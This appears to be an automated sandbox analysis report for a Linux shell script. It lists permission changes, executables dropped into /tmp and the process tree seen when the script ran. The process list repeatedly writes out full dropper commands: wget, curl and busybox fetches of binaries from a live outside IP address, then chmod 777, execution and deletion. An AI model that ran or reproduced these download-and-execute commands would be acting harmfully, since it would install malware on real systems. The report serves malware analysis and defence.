Analysis Overview
SHA256
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918
Threat Level: Shows suspicious behavior
The file 7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 02:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 02:42
Reported
2024-11-14 02:44
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
32s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
Processes
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
